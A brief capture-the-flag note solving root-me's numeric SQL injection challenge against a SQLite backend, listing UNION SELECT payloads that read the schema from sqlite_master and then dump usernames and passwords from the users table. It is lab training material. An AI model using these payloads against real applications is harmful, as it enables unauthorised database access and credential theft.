SQL injection: numeric

root-me challenge: SQL-injection-Numeric: Retrieve the administrator password.

---

news_id=1' UNION SELECT NULL --

SQLite3::query()

Using PayloadAllTheThings: SQLiteInjection:

news_id=1 UNION SELECT NULL,sql,NULL FROM sqlite_master --

news_id=1 UNION SELECT NULL,username,password FROM users --